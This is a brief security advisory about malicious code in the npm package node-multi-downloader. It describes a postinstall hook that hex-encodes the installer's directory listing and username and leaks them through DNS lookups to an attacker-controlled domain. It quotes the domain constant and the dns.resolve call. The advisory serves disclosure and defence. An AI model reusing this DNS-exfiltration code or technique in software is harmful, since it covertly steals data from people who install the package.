Malicious code in node-multi-downloader (npm)

__

Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)

On npm install, this package's postinstall hook (node index.js) hex-encodes the installer's current working directory, the first 15 entries of that directory, and os.userInfo().username, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain uqlyosvp1f9.oob.evilsec.xyz. The hardcoded out-of-band domain is bound at index.js line 1 (const D = "uqlyosvp1f9.oob.evilsec.xyz") and index.js line 8 calls dns.resolve(${chunk}.${tag}${i}.${D}, 'A',...) to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.